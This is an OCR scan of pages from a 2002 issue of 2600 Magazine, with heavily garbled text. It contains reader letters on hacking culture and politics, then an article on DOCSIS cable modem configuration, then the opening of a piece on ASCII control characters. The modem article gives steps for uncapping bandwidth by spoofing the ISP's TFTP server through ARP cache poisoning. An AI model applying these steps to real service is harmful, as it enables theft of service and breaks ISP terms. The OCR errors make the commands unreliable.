on page 31-32, and you guys mentioned something
abo u ill ic Can ad i a 1 1 e tec f i on s v sre m aw ard mg c he w i n -
ner to the person who received the most votes. This is
probably a good thing. However, the Electoral College
in the U.S. does serve a purpose, and lhat is to make i!
harder for the states that are more populated to wield
power over the states with lesser population, thus mak-
ing it harder for a presidential candidate to win Ihe of-
fice of President, Now. I do not think that Dubya
should have won the presidency (1 voted for Ralph
Nader, and nearly persuaded my mother to do so on the
way to the voting booth), but abolishing the Electoral
College would give much more power to the East and
West Coast (for better or worse), and make it That
much easier for ihe majority to force their will on the
minority. This is something ihe Framers made espe-
cially hard to do, and for a very good reason (Le. slav-
ery). I would like to know why you would have the
Electoral Colic ge a bo Eish ed .
Jon McLaughlin
tf imposing the will of the majority over The minor*
fi.v is such ls ritrerK, why dm 'i wr see systems fiA<* (hr
Electoral College put into place for other elections
and refe rend urns * We're certain that we could find an-
gry people in sparsely populated regions of every 1 slate
who feed the people In the cities unduly influenced
mas for governor, senators, representatives, etc,
Should nc give these people more mover because there
are less of (hern Is this not fit si. another je>rm vj ajfr-
mutjyc action which rouses ware harm than food ' Hu;
the real proof that the flee timid Coil eye is a failed sys-
tem (apart from oil of ihe people in the rest of the
world laughing and pointing j Lx in die official numbers
Spring 2002
Page 35
for minority candidates. The person who you and
many others wound up voting for got, according to she
Electoral College, a total of zero votes, I Joes that seen f
evert remotely dose to fair?
Dear 26(H):
E noticed in your response in i 8:3 to the letter un-
der the heading "Guns/ 1 you wrote 1 ..oppression from
the most jxwverful government in the history of
mankind." I just wanted to correct you. The most pow-
erful government in the history of mankind in terms of
power was probably ancient Rome and* as far as size
and possibly even power, the British Empire,
Joseph McLeod
Tins will quickly devolve into semantics so let V de
fine our terms, By "mast powerful" we mean most ca-
pable of having a direct influence over all other parts
of the world in a very decisive wav r both militarily and
legislatively, ft's a frighten big concept regardless of
where yew stand politically.
Dear 2600 :
You do Mr. Conte rio a grave injustice in your let-
ters page ( IS, 4). His arguments are the voice of reason
- surely’
Look in it like Shis: there's only so much gun crime
in i he USA because the criminals can get guns easily.
And as Mr. Conierio points out, you usually only have
lo show a gun to deter a crime. Naturally, h has to be a
bigger gun than ihe criminal has.
So i he solution is simple. Encourage everyone to
get a bigger gun than the average criminal and carry it
with them at all times. This does leave the poorer sec-
tions of society more vulnerable (being unable to buy a
big gun), but this is all to the good ns it means the
criminals will target them, instead of respectable, law-
abiding citizens (with money)
But I wouldn't stop there 1 Who is to say that adults
have more of a i ighv to life than children? And having
seen the reports on atrocities in high schools over re-
cent years, is n not reasonable to campaign for chil-
dren lo be able to defend themselves? Of course they
should! "Guns In Schools' can be the campaign slo-
gan. With proper i raining (it should be a required sub-
ject). most children arc every bit as capable and
responsible as an average adult to own and use a gun
(well, an average adult after a beer or two, anyway).
I mean, if somebody went into a school with a ma-
chine that could launch baseball bats faster than the
speed of sound at the rate of orte hundred per minute,
would you ban baseball bats?
1 think my point is abundantly clear* and I trust I
have your full support in this matter,
m skz
We. not h-ed you shied away from the infants ' right
to carry issue. (5b 1 ward,
Observations
Dear 2600 :
l Eyorrowed my friend's copy of Grand Theft Auto
3 for Playstation 2 and he informed me that a guy on
o ne of the radi o station s proc I ai med Free Kevin!" So
for the next few days when 1 played 1 would set the ra-
dio station to "Chatterbox" and after a while ! finally
heard it. It was kind of pleasing tu hear the message on
such a popular video game. Then when 1 was looking
through die booklet fur the game, I noticed they listed
guests for 'Chatterbox” in the back. So \ read through
and noticed the name "Bernie S," Very nice.
noire
SK i ar 26(H):
Hey guys, great issue. I was walking out of Barnes
and Noble at dusk with the magazine (18:3) in my
hand looking a! the cover: As I crossed under a light
the glare revealed the secret item! The peace sign. I
love it. Always keeping us on our toes. Thanks guys.
Gustaf
Dear 2600:
I was signed into MSN Messenger on January l Oth
at M;]() Eastern Time, and l go! a Maintenance Alen"
dialog box telling me that MSN will go down in five
minutes for maintenance. U this happened to everyone,
then there i.s obviously some way that you can cull a
dialog box on the machine of everyone who is signed
into MSN ai the momenL It kind of makes you wonder
w hat kind ol oilier events they might be able to initiate.
It anyone had a packet sniffer running and caught ihis.
or if yon have more information on how this may
work, please let us know.
p&ykOmantis
Dear 2600:
I recently moved into a cheap three- story apart-
ment building. One day I got curious and started to
lake the faceplates off the wall Behind where my
phone line came in I discovered not just one wire, hut
three! I Jpon further investigation l found that one was
for my apartment, with ihe (wo others providing dial
lone to the Hour below me and the lloor below diem!
1 (link about how easy it would be to tap into the line, I
found a similar configuration for ilie cable television
lines. Do you have a phreak for your upstairs neigh-
bor? Arc you sure?
bluuess
More proof of how insecure phone lines really arc,
This is very unlikely tv ever change.
Dear 2600:
I was watching the other day (again) the movie
Hackers and something caught my eye on the desk
where Kate Acid Bum" Libby is preparing for her
"battle" with fellow hacker Dade "Zero Cool/Crash
Override" Murphy. Thai is a copy of the magazine
2600. I w onder how many others caughi this.
Hernia ei
Another appearance occurs when the federal
41 gent is reading "The Hacker Manifesto " in the car.
He's holding a copy of our magazine- That piece, how-
ever . ; appeared in “Phrack . " pen here : They couldn't
figure o’ut how to hold up a copy of an electronic
newsletter so they just revised history a hit. Also , check
out the subway cor scene as well as the wall in Phan-
tom Phreak s mom. Those are original yellow HOPE
bumper stickers from l 994 r now worth many thou-
sands on E-bay.
Dear 2600:
I have read before how someone used "sale web" lo
Page 36
2600 Magazine
gel around school or public firewalls but the problem
is sites- like those are always blocked, Hut the one thing
they can never block are translator web sites, like Alta
Vista, All you have to do is enter the URL and change
the language from "whatever" to English, Let's say
you select German to English, Et will go through,
change all the German words to English, leave fill the
English words, and bam! You are at 2600, com ;
t ody Beeson
We suggest using Chinese to English since there
an- enough German words with the same spelling as
English ones to make our web sire rather weird to read
if you try to ' translate " from Gentian,
I tear 2600: v\_j/ IT 1 B
Just wanted to let you guys know you're getting
some free advertising, I was reading this humorous Fi-
at d Fantasy parody when I came across this page
showing a character reading 2600 at http;//wwwmiik-
I carpo wer.&im/coniic-/05 8 .htm, i hope I’m not getting
the author of the comic in any trouble. (No, I’m not
him.)
DephKonl
Dear 2600:
l wish this letter had more point to it. but it really
doesn't. In the sentence in your Marketplace section of
IK :3 and 3 8:4 ( i d presume more of them) under the
heading "Only subscribers can advertise in 2600! "you
will notice near (he end of the paragraph it says. "In-
clude your address label or a photocopy so we know
void re a subscriber Send your ad to 2600 Market-
place. PO Box 99, Middle Island, NY 1 1953. Include
your address label or photocopy."
Otherwise, l love the publication. Keep up the
good w ork The hidden "peace" symbol in 1 8:3 w as re-
al ly near and l never noticed it until othef$;#oi tiled it
out later.
4wifitc^07
Well, we never noticed this repeating phrase Until
vatt pointed it out so thanks. Its the etui of t&i oversight
that \ been occurring since Spring i99&.
Dear 2600:
In addition to the article I wroie on Black Ice for
(he 18:4 is sue of 2600, I would like to mention that ISS
has released a patch for users with Windows XP and
, J K. There is a hole that will allow "hackers" to execute
computer jacking and crashing. Normal stuff. Just
i bought l should put that out there since it was not in
the original write up.
Suicidal
Dear 2600:
On the Rat Rat e DVD. as an extra, the producer
kUid director do candid calls to the actors in the film.
They apparently didn't know that the touch tones
t\ corded in the conversations can be used to call the
aclors!
As a friend of mine put it, "Hey. i goi your phone
number off of the DVD.., you should have hough: a
squirrel!"
Phonkud utic
A reference lost on anyone who hasn V seen the
film. We imagine some actors wound up having to
change their numbers after this rather stupid over
Dear 2600:
We enjoy wearing brown pants and sni fling your
magazine on Wednesday evenings while composing
music with our Tandy are wearing
brown pants'
1W Avocados
And this is as strangely haunting os a David Lmch
film.
The World of Retail
Dear 2600 : _
I was in a local bookstore in Sacramento, Cali for-
ma thaL 1 know carries your periodical and I decided to
check to sec if I had your current issue. I w as surprised
to sec a fairly large stack of your magazine hiding be-
hind an issue of something or other. Needless to say, 1
already had that issue so [ moved the magazine to un-
cover it for other customers. I came to the conclusion
thaL it was intentionally covered when 1 returned u
week or so later to discover the same situation, 1 don’t
know if an employee was doing this or someone else
with a strange hobby, but either way I think it’s a terri-
ble way to sell magazines. Perhaps you at 2600 should
start printing on excessively large paper to increase
visibility, I plan to make it a routine to stop at that
bookstore to make sure you are kept visible to shop-
pers. You’re probably thinking why don't 1 tell the
shopkeepers 1 .' Well, it just ain’t my style.
The Dude
We appreciate all of our readers who took out for
this sort of thing. Most of the time the people who hide
our magazines area i affiliated with the stores. We sim-
ply have a lot of enemies who don V want our views to
be heard. Consider it an attack on all of us.
Injustice
Dear 2600:
In response to ''Consequences" published in 18:3, 1
am not sure that everyone is aware of how- bad things
have gotten. I think it is horrible that Sklyarov was ar-
rested for violating (he DMCA when what was being
done promoted the sale of more eBooks. There arc
many injustices that have been done to many good
people. As far as 1 know. ] am the first person to be ar-
rested for performing a port scan in the process of pro-
tec tmg a 91 1 system I was put in charge of. A simple
port scan now seems to be an offense that (me can be
arrested for, While I have been successful at defending
myself so far, it is still something that most computer
people don’t realize the rest of the world doesn't un-
derstand and which therefore must be il legal. Several
articles have been written on my case, one by Bill
Reilly, who is working on the Elcomsoft (Dmitry Skl-
yarov’s employer) case. It can be seen at;
http: // w w warn I i n esecuri ty.eom/Commumty_Forum„_d
etai 1 .ph p?artic le_id -23, Being the Jtp* to ha ve to de-
fend a case of this type I ciut re I ! you ,u is a very diffi-
cult task to undertake and I don't wish it on anyone,
The devastation to business and family as well as ban k
account is iiemendotis^Sftd 1 am not sure that many
Spring 2002
Page 37
people u rulers land what is involved. I thank your mag
a/ine lor doing a great job on promoting rights and
telling some of these stories so that the people know
what is going on.
Scott Moulton
System Specialist and Software Engineer
Dear 2600:
1 was working at Bridgestone Firestone Lnforma-
don Services during the recall, so I was already biller,
file law -.nil again si 2600 is to much... doubt I'll ever
drive a Ford again.
Found On Road Dead, cute huh?
bt
Dear 2600 :
So r m am in Omaha visiting my girlfriend over
the Christmas break. Just before 1 left 1 grabbed a 2600
a i B&N to read on the flight home. I flew into Chicago
and had to switch planes.
Whenever f fly I ask to sit in emergency exit rows
in order to get more leg room. Before takeoff, the flight
attendant stopped by to make sure (hut l would agree
to perform emergency tasks if needed. t told her it was
no problem and continued reading my magazine.
I was into reading an article when ! finally realized
that we hadn't left the terminal yet. I looked up and u
man had come onto the plane from the terminal. S
watched him as he came up to me aiid said. 'Sir. I need
you to step off I he plane, please bring your things."
Confused, I stood up and walked off the plane.
Once on the sky-bridge, they informed me that I was
going to be ". screened'' again. Before they started I
asked why, and they replied, "the flight attendant said
you were reading a terrorist pamphlet.' ] w as confused
.■if best iind then explained to them that it was u maga-
zine about "computers and electronics. They then
asked if they could look at it and had to OK it w ith ihe
pilots before l was allowed back on the plane. Oh
yeah, I had to be "screened"' again as wdl.
My guess is that she saw- the article about vulner-
abilities' 1 in Passport - ' (regarding the article on Mi-
c rosoft \ new .Net Passport stuff].
I understand that wuth all of the recent events that
people are more concerned about security, but 1 think
there is a place where we need to draw the line. Caus-
ing a flight to be delayed for more than an hour over
my reading a magazine is not acceptable.
Anthony \h Bower
Please write buck to us (paper mail wit! get a hu-
man's attention a lot faster) with as much specific in-
formation on this as possible. When such events m cur
we need to hum exactly who is responsible so they con
be dealt with as severely as possible. The idea that you
can be taken off a plane because some dimwit dnesn )
understand your reading material should he consid-
ered an affront to every freethinking person alive .
Deal 2600:
I can’t believe it! Absolutely outrageous! Rogers
has really pissed me oft this lime! I called Rogers’ tech
support tor E heir cable Internet and I found out that you
aren’t allowed to run w : eb servers while you are con-
nected via Rogers Cable. II you do, then apparently
you will be found out and they wilt come Lind lake
your cable modem away. Gee/,, all 1 wanted to do was
run a puny little game server for Unreal Tournament,
[he i! tech support guv told me that they scan all of
i heir Rogers Cable customers for web servers, I think
that this is stupid. Why would Rogers do that? Is (here
any way to circumvent tile scans, so that my Unreal
Tournament server dream can become a reality ?
Johnny Slash
Internet access i ia a .table modem Is not true In-
ternet access , If 's primarily meant for outgoing traffic,
not incoming, such as you would he getting on a web
set ver, This is yet another reason to support your local
Internet Service Provider win.) vi dl generally not get in
vtHtr wwy as to how you choose to use the net.
Dear 2600:
Re e cut! y ! received a chain letter in my t n box . I he
chain letter had a boring poem about two friends who
are too busy in life U> speak to each other When one fi-
nally decides to visit the other, he turned out to be dead
from old age. What this has to do with a chain letter
aside from conveying a moral of no use. 1 can't deter-
mine The letter had a standard set of instructions.
Send this letter to a dozen or so people within three
hours of reading or suffer incredible bad luck.
I dug up all the e-mail addresses listed uv the e-
mail and replied back to them. I quoted Robert Frost.
"The Road Less Traveled?' and told them ail to take
the road Jess traveled and not forward the chain letter
on to a dozen other people to venture on into an end-
less tree of useless e-mail.
To my surprise, i received several replies from
people who could not determine how I knew their e-
mail addresses, even though the e-mail i sent io them
had the original chain letter within the body, Appar-
ent fv. f pissed off a bunch of people making them feet
foolish for sending the message to their friends. If you
consider it T it’s thinking only about yourself that drives
you to ship off an e-mail to all your friends so they can
take on the harden of bad luck if they don’t spam oth
ers within three hours of reading.
To make a long story short, J was supposedly re-
ported to some Internet security agencies and told I
wasn't aware of the repercussions of my actions.
Tell me i don't have the right to free speech,
"Nicolai... you don't have the right to free speech,"
There we have it.
Nicolai
Dear 2600:
! just wanted to write a quick letter to you guys
telling you that 1 e-mailed Ford informing them that I
was boycotting (and encouraging everyone i knew io
boycott) them due to the legal actions they were taking
against 26(Xh I told them that Freedom of speech is
probably the most important freedom we have a.s
Americans and that I could not accept them taking le-
gal actions to prevent said freedom Thanks for the
great magazine and website, guys. If you keep writing.
E'l! keep reading.
S unlist
Dear 2600:
Why ts it that those in power are so afraid of peo-
ple who they see as a threat to that power ? I’m enrolled
Page 38
2600 Magazine
'ii a Business Technology course at my high school.
Ii s sold ns some super advanced course, hut 1 person
illy find it to he a little below my level, so 1 find my-
still spending most of my time helping the instructor
with little pr oj ec ts on t he s ide. A few wee ks ago we re-
placed has school -owned piece of shit computer with a
rather nice Pentium III machine we built ourselves. In
order to connect to the school network however, we re-
quired a co.uple of programs which the system admins
refuse to give out. Namely Novell Client software and
some program the teachers use lo do attendance and
grad ebooks called STL After several work orders were
filed in an attempt in get someone From the lech de-
partment to come and lake care of this issue for us -
each of which was simply ignored - we decided to rake
matters into bur own hands. After a couple of hours
spent scrolling through every directory on every net-
work drive on the school server l access to which his
"teacher access" provided - no hacking was required h
1 managed to find copies of both programs needed. We
downloaded the software and got our system up and
running, Yesterday he was called into a meeting with
the Superintendent of Schools and accused of using his
class to train hackers He is now teaching a restricted
curriculum. They tell him quite specifically What he
can and can t teach. Myself and a few other students
who hud absolutely nothing to do with the alleged at-
tacks now have our computer privileges closely scruti-
nized. Wf also have reason to believe that certain
individuals in the upper levels of the admin hierarchy
have been sabotaging our equipment.. Ultimately what
it comes down to is this: the school lech department
sees myself and a few other students as a free source o!
labor which the school board can lap to do their jobs
This threatens their paycheck, so we're on the slid list
1 have three months to go until ] graduate high school
and get rid of all ihis bullshit once and for all. Fm bit-
mg my tongue and resisting the urge to do some real
damage. Why is it that people in power seem to go out
of i heir way to threaten, anger, and ultimately push
perfectly legitimate hackers to do the kind o:i things
that give us a bad rep? I'd have to say that not wanting
iu restrict future generations even further is the only
reason I haven't done such things yet fust three more
months,
Ghent
Even if you were ihr foM t Jto.i of .sem^rs m ymtr
high school, destruction wonldn i he the answer: Nath-
mg would make rise morons who antagonize you hap-
pier. What's important is for van to reveal their
stupidity iti ways that non -technical people van under
stand, You've indicated that there is a paper trail
which would prove that von attempted to yet help from
the tech department and that they ignored you. Ass am -
mg you dido) violate any software licenses in doing
n hat you did, it should he a snap to prove that you did
nothing wrong . Then s no reason why you can't for
shot ddn V) continue to help with this after you're gone.
Hear 26(H):
I was pretty disgusted when u friend of mine told
me about a new kids' show that his kids were watch-
ing It s called Cyherehase and the URL, is at:
In i p://pbskids.org/cyberchase/mcet_b;icker hi ml r
He said, "I haven't seen more than two minutes ot
it, but the gist of the show is that hackers arc bad. In
fact, my kids now call each other ‘hacker' as a put-
down."
They are planting seeds I tell ya. I like PBS but al-
ter seeing this, Fm going to write a short note to the
pbskids.org site (unless you have a better contact), just
to let them know how I feel about this "toon
Just thought Fd pass along this info. Maybe others
might want to rethink donations or write a (nice) short
note,
johnny fulcrum
If 's essential that people express their fee lings
about this since it's a really unfair < 'ha raclcri Tjltion .
Contact your local PBS station as well as PBS, the
Corporation for Public Broadcasting, and the Na-
tional Science Foundation, aft of whom provide fund-
ing. h r ^ had enough to have the evil character he a
hacker has for his actual name to be Hacker is a bit
much.
Dear 2600:
I had nothing to do last Monday so I went to a Lee
lure given by Janet Reno at my college. 1 was bored,
and 1 thought that she might have something intelli-
gent to say. After announcing that she was running for
governor in Florida and an unconvincing tirade about
how we need to "shake up the government .system,"
Reno stated that "we need to protect our young chil-
dren. from the hackers that try to seduce them in chat
rooms and prevent hackers living in other countries
from stealing funds from America’s banking institu-
tions.' After this broad generalization* I was pissed
and wrote a question on the paper provided by the
proctor nt the assembly. After a slew of questions
about health care, the legal system, and even a ques-
tion about whether leb Bush was more intelligent than
George W, Bush, she neglected to answer "Why are
hackers still being criminally prosecuted for pointing
out blatant and potentially dangerous security holes in
government and business computer networks?" I guess
ou r n ati on's po! i t i ci a ns arc sti I ] u n ab 1 e or u nw i ] I ing t o
tackle the injustice in our society,
Polar Mike
She probably watched an episode of ''Cyherehase' 1
right before giving that speech. Children s cartoons
are popular with politicians and it explains the level of
their intellect. It would be a good idea to keep track of
all the stupid things they say about hackers.
Dear 2600 :
As I am Sure you know, the goddamned SSSCA is
still being bandied about. This is basically she com-
plete bending over of customers by the RFAA* MPA A,
and other lobbying groups. Because Congress is here
to represent business, right? This country was started
on the premise 11 We hold these truths to be self evident:
every corporation has the right to as much profit as
possible, regardless of the rights, health, or well being
of the citizens of these United States," right?
Here is a great website that is trying to fight by
sending faxes lo congresspcople: hiLp://\vww,digiEal-
coi isu me r,org-/fa JrihtmJ , You con use their letter, mod-
ify it, or write yotfr owoi. Please Lake a moment to do
this. Maybe we can get some of our rights back for a
change. | Continued on p u ^ c 4 8
Spring 2002
Page 39
by Paiikaj A rota mi
pankh pirorn pa wa re.efifii
An interesting aspect of cable modem tech-
nology is the evolution and standardization of the
Dam Over Cabt^ervire Interface Specification
( DOC' S f S ) , de ve lof ied by C af S c Tc I ev isi on Labo -
ratones, Inc. and approved by the b)icruauon,al
Telecommunication Union (ITUJ.
The locus of this piece deals with the way
ISPs configure DOCS IS -compliant cable
modems and is constructed in a fashion that edu-
cates the reader on how a cable modem user
could potential I v configure their own device.
Take very important note* reconfiguring and/or
tampering wit It your cable modem not only most
likely breaks your terms of service agreement but
could potential !y be found illegal in most juris-
dictions and would then be punishable by law. If
you wish to experiment, prior permission from
your cable modem service provider would most
certainly be necessary. 1 urge you Lo educate
yourself through this writing but not to break the
rules, and I urge cable modem service providers
to use the information contained in this article to
"spoofablc ’ 1 ) MAC address which will be accom-
panied by an IP address which is either static or
dynamically assigned by the ISP and of course
handled in software.
However, a feyrffhings most people may not
know are: 1 ) Thefcabie modem itself has a hard-
ware address arid in IP address on the HFC inter-
face and 2} The cable modem itself has another IP
address on the CPE interlace. Generally this IP
address is 1 92, 1 68. 100. 1 ,
When you turn your cable modem on. ii uses a
primitive TCP/IP stack and DHCP client to re-
quest an IP address for the HFC interface. With
some ISPs the IP address it will receive will be a
Hkx.x.x add re s s . Addi t i onal 1 y , upo n rece i v i n g t he
IP address for the HFC interface, it may also re
eeive the IP address for the ISP's Trivial File
Transfer Protocol (TFTP) server. Upon the mo-
dem obtaining the IP address for the TFTP server
it will connect to the server, download a configu-
ration file. and use that to setup such thing* as
downstream and upstream bandwidth caps. Its a
rather simple process that usually doesn’t take
more than a minute.
help better protect their service, 1 have a cable
modem myself and I respect my cable company
and the law - but 1 also highly value free speech
and learning.
This article makes the assumption that the
read e r h a s prior 1C P/1 P, networking, a nd Li n u x
knowledge (although this can theoretically be
done on plenty of other OSes). There are certain
exceptions to the content of this article and claims
are based on a generalization of the DOCS IS -
compliant cable modems that exist on the marker
today as well as my own testing - and the work of
others.
How does an ISP configure DOCS IS -com pi i-
ant cable modems'? To answer that, one should
first take notice of the interfaces on a cable mo-
How would one hypothetically configure a ca-
ble modem ? To configure a cable modem, the first
thing one would have to do is obtain the IP ad-
dress of the ISPs TFTP server. For some it mav
■j
actually be t he same as the ISP's DHCP server. To
find the address one could look at the information
provided by the cable modem's mini web server
(which exists on some modems such as certain
Motorola SurfBoard models and can be accessed
via the Ethemel/USB interface IP address, e,g.
192. 168.1 DO. 1, using a standard web browser I,
Conversely, if that option isn't available or it the
1 1 I P server information isn’t given via the web
server, then one could possibly use an SNMP
client to scan the modem for that same informa-
tion.
dem. One interface connects to the coaxial cable
itself . This is the HFC interface. Another is tradi
lion ally either Ethernet or USB (or both in some
models) which is used to connect the cable mo-
dem to the customer's computer (or other network
device). This is the CPE interface. As you may al-
ready know, the device we connect the cable mo-
dem to will have a hard-coded (but still
Using this same processes k one would also
need to obtain the name of the DOCSIS configu-
ration file the modem downloads since TFTP
doesn't allow you to list directories and thus a
specific filename must be known to be able to
download the configuration file. Once you find
that out, the next steps are to use a TFTP client to
download the configuration file off the ISP's
Page 40
2600 Magazine
I FTP server and to use a DOCSIS utility to dc-
l <xJc the file into a readable text format. Once you
decode the configuration file, it will look some-
thing like this:
Main (
NettooritAccess /;
( lassOfService j
Class ID I;
MaxRateDown 1 544000;
MaxRaieUp 128000;
Priority Up 0;
(hmranteedUp 0;
Affix Hurst Up 0;
OnvacyEnable 0;
!
MaxCPE 3;
•'* EndOfDauiMa rker V
/
One could theoretically adjust the settings to
lus or her own preference. For example, setting
MaxRaieUp to 0 would remove any upstream cap
that may exist on the cable modem's end and set-
ting MaxRateDown to 0 would do the same for
downstream. Alter any changes are made, the file
can be re encoded using a DOCSIS utility. Again,
let me stress to you, know the rules and follow
them. This information is provided for under-
standing and was not produced with the intent of
fostering and/or promoting illegal activities. Be
smart and keep it legal, but at the same time don't
be at raid to team about this technology.
1 low would one apply the configuration them-
selves? The next steps involve running both a
I FIT server and a time server i since manv cable
•r
modems lime -stamp log entries those modems
make) on the compute r/de vice that is connected
to the cable modem (CPE interface]. The process
is rather straightforward:
i) Place the conhguralion hie in the root di-
rectory of the TFTP server making sure you use
the exact same tile name your ISP uses
?) Depending on what OS you use you may
want to create an entry in your HOSTS lile lor the
modem's CPE IP address (since DNS will not be
available when the cable modem is connecting la
in. I KI P server and things such as the standard
I .mux inetd sen ice does not like the lack of DNS
ivailahility when resolving hostnames - most
l mux distributions have the HOSTS tile at:
etc /hosts).
3) Create an alias IP address on the interface
dui cable modern is connected to. As you may
li.tvc guessed, the alias IP address needs to be the
1 1 J address of the TFT P server as you are going to
he doing a little spooling. Depending on your CIS.
this can be done in a variety of ways. Under
Linux, with IP Aliasing installed in the kernel,
■ in- could simply issue the following command;
ilconlig ethO: 1 ctftp server> net mask
' S 5 2 5 5 . 25 5 . 255 . Re p 1 ace <t ftp serve r> vv ilh l he
IP address of your ISPs TFT P server of course. If
you don't have IP Aliasing built into the kernel or
otherwise generally available you could just theo-
retically change your IP address to that of the
ITTP server for the time being. You will want to
ensure you set the nelmask to 255.255,255.255 to
avoid unwanted network routes which could
cause problems.
4) The next step is to create a static route to
your cable modem to ensure you are coming from
the spoofed address. Under Linux one could issue
the command: route add -host <cpe interface ip
address> gw <tftp server> again replacing that
which is in brackets with the proper values.
5) Once all the preceding setup is complete,
one would start their ! FTP and lime server with
everything in place and start pinging the cable
modem s CFE IP address and then, while that is
occurring, reset (he cable modem (or unplug it for
a few moments anti plug it back in).
If you were able to get Ibis far and you set
everything up right, chances are the cable modem
will download the configuration file from you,
Once this is complete the aliased address can be
deleted or the IP address can he set back to DHCP
or the static address given by your ISP, Addition-
ally. you can stop pinging. You can verify this
works via an SNMP query on the CPE interface
or by just testing the results of any changes made.
Back up! How does this all make sense? The
setup is similar to that of how it is set up on an
ISP's end. for the most part. The pinging of the
cable modem's CPE interface poisons ’ the ARP
cache of the cable modem and the resetting of the
modem Hushes the cache so the ISP's T1 FP
server MAC address (the real one) is flushed out.
This process essentially makes the cable modem
believe the MAC address of the TFTP server is
you rs ins lead t i f that w h i eh be lo ngs to i he ISP's
TFTP server which - as far as the cable modern is
concerned - makes you the TFTP server it wants.
So when it s ready, it w ill connect lo your box and
get your configuration file. If you have a detailed
enough understanding of TCP/IP this should
make sense. If not it's okay, there are plenty of re-
sources available to learn more of the fundamen-
tals. There are many potential barriers an ISP may
and should pul in place to prevent Eh fo procedure
from working. Additionally, some cable modems
don't allow you to ping the CPE interface until it
obtains the TFT P configuration lile. which would
essentially prevent the spoofing from working as
it will cache the correct MAC address before you
can deliver it the wrong one by pinging ii How-
ever, for the most part this process tends to work -
at leasL for now.
1 hope this article extended your understand-
ing of how cable modems work and are config
ured - the utilities, servers, and services
mentioned in this article are readily available on
the web for numerous platforms.
Spring 2002
Page 41
by hairhttll
hairban@illgotteD.nel
In ihc course of a computer security professional's everyday ueh <ti riinc. we can't help Inn nnut*
across several programs that can Jo 'interesting things with passwords. From the everyday U ntx/Li mix
password cracker to the Windows brute forcing programs strewn all over the Internet, I see the same sin-
gle problem that seems to envelop most of them. Many read from a password list instead of generating
the passwords as they go. While this makes perfect sense when used with '"most common passwords 11
lists and all, when it comes to brute force this is very impractical due to the large number of possible
password combinations. Let's do a little investigation.
As many of you probably already know, (he ASCII character set contains a total of 25b unique char-
acters, Remember that a byte is eight bits, and that a bit is a one or a zero. Therefore, in the range
CHlOOOOtXM Mil 1 11, only 256 possibilities exist. So every tile in existence can only contain combina-
tions of these 256 characters and nothing more. Numbered 0-255, each character possible has its own
ASCII code. The first 32 codes (0-3 1 }, when it comes to text hies, are control codes. These codes, which
date back to MS-DOS 1 .0, are passed from program to program to perform certain functions. For exam-
ple. code 7 is the "bell tone" code. This is die code that causes your computer to send the motherboard the
command to make your onboard PC speaker beep. On a PC compatible system, entering a raw ASCII
command is as simple as holding down the ALT key and entering its code on the numerical keypad (not
vhe one above the letters),
Here’s a simple example:
/) Open u DOS window (C:\CQMMAND.COM on most versions of Windows/DOS ).
2) At the command prompt, enter "ECHO", and a space.
3) Now \ hold down the ALT ke\K anil press 7 on the numerical keypad.
4) Release the ALT key .
5) Your screen should say something similar to ”..>LCHO A G\ "
6) Now t press the enter key.
Since the DOS command "PC HO tells your computer to spit back at you what you just entered, it
w ill display the control character on your screen But the code you just entered is not a visible character;
it is the bell tone code. Instead of " A G" being proudly displayed, one of two things w ill happen. Depend-
ing on your system configuration, either your PC speaker will beep (sometimes it will just click on cheap
motherboards), or Windows will play the "default beep" sound hie that’s programmed in the system set-
tings. In the latter case, Windows simply intercepts the motherboard's heep command and interprets it in-
tern ally.
Other control characters, include "backspace" linefeed" UtJ). and ,! 'character return' <AA). Each of
the ASCII control characters also has a simple keyboard command, such as "break" (3) which is
CTRL+C. Notice how r the above bell tone example displayed A G on the screen' ? This is because ALT+7
and CTRL+G are the same ASCII command character. This is how functions such as CTRL+C (copy)
and CTRL+V (paste) work in Windows.
Here's a simple example;
7) Open DOS window {again l
8} At the command prompt, enter 'DIR' . the DOS command to list the files in the current directory*
9) Now, holddown the ALT key 1 , and press id on the numerical keypad.
10) Release the ALT key
11 } Notice that the directory was displayed. This is because ALIA IS is the same as enter:
12) Now, tty it again hx entering DIR at the prompt again.
IS) This time, instead of AIT+1L use CTRL+M.
14) Notice the same thing happens, because CTRL+M is the same as ALT+I3.
ASCII codes 32-1 26 are where the common keys are: A-Z, a-z, 0-9, plus all the symbols keys, space,
and whatnot. 99.9 percent of the time a system password will consist of nothing hut these characters.
ASCII codes 127-255 are the "extended" characters. These codes are characters with accent marks,
drawing characters, and other such novelties. These characters are interpreted differently in DOS and
Page 42
2600 Magazine
Windows environments, and cause a lot of compatibility issues. For this reason, they are mostly not well
understood by the Windows generation. At a DOS window* try ALT+ 176, 177, 178, 219* These are shad-
ing effects used in old school DOS programs. Also, check out the border drawing set, ALT+ (179-222).
11 you have ever seen a DOS program l has draws a border around itself without any graphical modes, this
is how it does it.
I nix and Linux, because of the nature of the OS itself, can handle passwords made up of almost any
ombination of almost any of the 256 characters. Unfortunately, password files simply cannot contain all
«! this. The only characters that I know of that can’t be used in a l mix/I .mux password is code 0 and 13*
Remember from the above example thui 13 is the same as enter. So how would a password be able to
contain an enter as a character? It can't. Code 0 is NULL, and entering nothing is nothing. Linux pass-
words can, however, contain the linefeed character. This is where Windows has some trouble. In Win-
dows, both a linefeed and carriage return are needed to end a line in a text I tie. But in Unix/Linux, they
both perform a different function
A line feed is a control character that says, "Go to the next line." A cant age return is a control charac-
ter that says, "Go to the beginning of the line." So in a normal Window, s/DOS text file, each fine ends
with both a linefeed and a carriage return. Here's an example
W h a l vour computer secs:
hu is COOLfCRULFfHe likes Cheese Pi&aHCRHLFlDMCA Sucks.
What you see:
foe is COOL.
He likes Cheese Pizza !
i*MCA Sucks,
Your computer displays the first part, "Joe is ( COLA It hits the carriage return code and puts the cur-
sor back m the beginning of the line - at the J in Joe. Then ii hits the linefeed character and takes the cur-
sor down one spot, right below the J in Joe. which ss the beginning of the next line. It continues
displaying the next line, "Tie likes Cheese Pizza!" until it hits the CR and I F again and repeats the
process. This is how each sentence appears to be on its own line, even though a text file is a continuous
string ol data.
F he problem arises when one o( the characters is missing. Let’s say lor some reason the text file does
not contain the carriage return control characters.
What vour computer sees:
Jot is COOLtl.FfHe likes Cheese P&.al/LFJDMCA Sucks.
What you see:
foe is COOL
He (ikes Cheese Pizza!
DMCA Sucks,
This is because the computer displays the first part, "joe is COOL. 1 ? hits the linefeed control charac-
ter. and spaces the character down one line where it left off. Since there is no carriage return, the com-
puter does not reset the cursor at the beginning of the line and it just starts printing where it left off, just
one line down.
Now let's say the same lexi files now have carriage returns, but are missing the linefeeds*
What the computer sees:
